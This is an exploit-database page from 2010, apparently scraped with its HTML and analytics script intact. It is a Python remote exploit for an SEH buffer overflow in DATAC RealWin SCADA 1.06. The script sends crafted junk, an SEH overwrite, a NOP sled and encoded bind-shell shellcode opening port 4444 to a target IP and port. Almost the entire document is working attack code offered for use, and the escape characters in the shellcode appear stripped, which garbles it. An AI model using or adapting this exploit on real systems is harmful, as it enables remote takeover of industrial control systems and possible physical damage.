[remote exploits] - DATAC RealWin SCADA 1.06 Buffer Overflow
Posted on 27 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>DATAC RealWin SCADA 1.06 Buffer Overflow Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='DATAC RealWin SCADA 1.06 Buffer Overflow Exploit by Blake in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================ DATAC RealWin SCADA 1.06 Buffer Overflow Exploit ================================================ # Exploit Title: RealWin SCADA System SEH Overwrite # Date: 10-27-10 # Author: Blake # Software Link: http://www.realflex.com/products/realwin/realwin.php # Version: 1.06 # Tested on: Windows XP SP3 running in VMware Workstation (rfx) import socket, sys if len(sys.argv)!= 3: print " [*] Usage: %s <ip> <port> " % sys.argv[0] sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) # port 912 by default # windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai # LPORT=4444, shellcode =( "xbaxe7x26x3bxa1x33xc9xb1x56xdbxcexd9x74x24xf4" "x5dx83xc5x04x31x55x0bx03x55xecxc4xcex5dx1ax81" "x31x9exdaxf2xb8x7bxebx20xdex08x59xf5x94x5dx51" "x7exf8x75xe2xf2xd5x7ax43xb8x03xb4x54x0cx8cx1a" "x96x0ex70x61xcaxf0x49xaax1fxf0x8exd7xefxa0x47" "x93x5dx55xe3xe1x5dx54x23x6exddx2ex46xb1xa9x84" "x49xe2x01x92x02x1ax2axfcxb2x1bxffx1ex8ex52x74" "xd4x64x65x5cx24x84x57xa0xebxbbx57x2dxf5xfcx50" "xcdx80xf6xa2x70x93xccxd9xaex16xd1x7ax25x80x31" "x7axeax57xb1x70x47x13x9dx94x56xf0x95xa1xd3xf7" "x79x20xa7xd3x5dx68x7cx7dxc7xd4xd3x82x17xb0x8c" "x26x53x53xd9x51x3ex3cx2ex6cxc1xbcx38xe7xb2x8e" "xe7x53x5dxa3x60x7ax9axc4x5bx3ax34x3bx63x3bx1c" "xf8x37x6bx36x29x37xe0xc6xd6xe2xa7x96x78x5cx08" "x47x39x0cxe0x8dxb6x73x10xaex1cx02x16x60x44x47" "xf1x81x7ax76x5dx0fx9cx12x4dx59x36x8axafxbex8f" "x2dxcfx94xa3xe6x47xa0xadx30x67x31xf8x13xc4x99" "x6bxe7x06x1ex8dxf8x02x36xc4xc1xc5xccxb8x80x74" "xd0x90x72x14x43x7fx82x53x78x28xd5x34x4ex21xb3" "xa8xe9x9bxa1x30x6fxe3x61xefx4cxeax68x62xe8xc8" "x7axbaxf1x54x2ex12xa4x02x98xd4x1exe5x72x8fxcd" "xafx12x56x3ex70x64x57x6bx06x88xe6xc2x5fxb7xc7" "x82x57xc0x35x33x97x1bxfex43xd2x01x57xccxbbxd0" "xe5x91x3bx0fx29xacxbfxa5xd2x4bxdfxccxd7x10x67" "x3dxaax09x02x41x19x29x07") head = "x64x12x54x6Ax20x00x00x00xF4x1Fx00x00" junk = "x41" * 228 next_seh = "xebx06x90x90" # overwrites next seh seh = "xeaxe3x02x40" # seh overwritten at 232 bytes - 4002e3ea nops = "x90" * 20 # nop sled junk2 = "x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode print " ====================================" print "DATAC RealWin 1.06 Buffer Overflow" print "Written by Blake" print "Discovered by Luigi Auriemma" print "Tested on Windows XP SP3" print "==================================== " print "[*] Connecting to %s on port %d" % (host,port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host,port)) except: print "[x] Error establishing connection " sys.exit(0) print "[*] Sending payload" s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + " ") s.close() print "[*] Payload sent" raw_input("[*] Press any key to exit... ") # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-27]</pre></body></html>
